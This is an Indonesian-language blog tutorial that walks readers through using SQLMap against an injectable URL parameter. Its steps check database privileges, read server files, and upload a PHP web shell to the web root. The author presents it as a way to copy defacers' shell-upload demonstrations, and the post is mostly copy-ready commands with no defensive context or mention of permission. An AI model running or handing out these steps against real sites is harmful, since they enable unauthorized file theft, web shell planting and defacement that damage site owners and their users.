Akses File Sistem Di Web Server Dengan SQLMap (Remote File Write)


Hallo, 

Saya lihat ada beberapa Defacer yang sering banget Show Off menggunakan POC SQLI > Remote file write with SQLMap. Sehingga Saya coba-coba browsing dan nemu caranya di blog orang Luar negeri lalu Saya tulis juga deh di sini.

Oke tanpa berlama-lama lagi, Langsung aja ke tutorial nya.

Cek Privileges / Hak Istimewa

Tahap pertama untuk mengakses file di web server adalah mengecek privileges atau Hak istimewa dari user, Kalian bisa mengeceknya menggunakan command dibawah ini:
./sqlmap.py -u "http://localhost/parameter.php?id=1337" --privileges

Bisa dilihat gambar diatas, User [email protected] memiliki akses ke FILE dan artinya Kita bisa READ FILE yang ada di situ.

Akses File Sistem Di Web Server

Untuk mengakses file sistem yang ada di web server caranya sangat mudah, Kalian hanya perlu memasukkan command dibawah ini:
./sqlmap.py -u "http://localhost/parameter.php?id=1337" --file-read="[PATH FILE]" --batch

Note : [PATH FILE] Diisi dengan PATH SQL ERROR beserta nama file yang ingin Kalian lihat (eg: C:/xampp/eviltwin.id/index.php)

Disitu Saya mencoba READ File index.php dan berhasil, File tersebut sudah tersimpan/terdownload.

Lihat File Sistem

Jika ingin melihat file yang tadi di simpan, Maka tinggal memasukkan command dibawah ini.
cat '[PATH FILE]'

Path file yang dimaksud adalah yang tadi keluar di SQLMap (eg: sqlmap/output/eviltwin.id/files/index.php')

Upload Shell (Remote File Write)

Selanjutnya adalah mencoba mengupload Shell (Remote file write), Untuk command nya seperti ini:
./sqlmap.py -u "http://localhost/parameter.php?id=1337" --file-write="[PATH SHELL]" --file-dest="[PATH SQL ERROR + NAMAFILE]" --batch

Perhatikan output nya di gambar diatas, Berhasil upload shell! 😅


Sedikit penjelasan mengenai command diatas adalah sebagai berikut:
  • --file-write : Di isi PATH shell yang ingin Kalian upload (eg: /storage/emulated/0/shell.php) Pastikan ada file shell.php di PATH tersebut ya, Jika tidak ada maka SQLMap tidak akan mengeksekusi command Kalian.
  • --file-dest : Di isi PATH Sql error yang tadi ditemukan di awal sertakan juga nama file nya (eg: C:/xampp/eviltwin.id/eviltwin.php).
Udah jelas kan? kalo belum jelas, Tinggal comment aja yaa.

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang "Akses File Sistem Di Web Server Dengan SQLMap (Remote File Write)".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi.

Semoga bermanfaat dan sampai jumpa di artikel selanjutnya!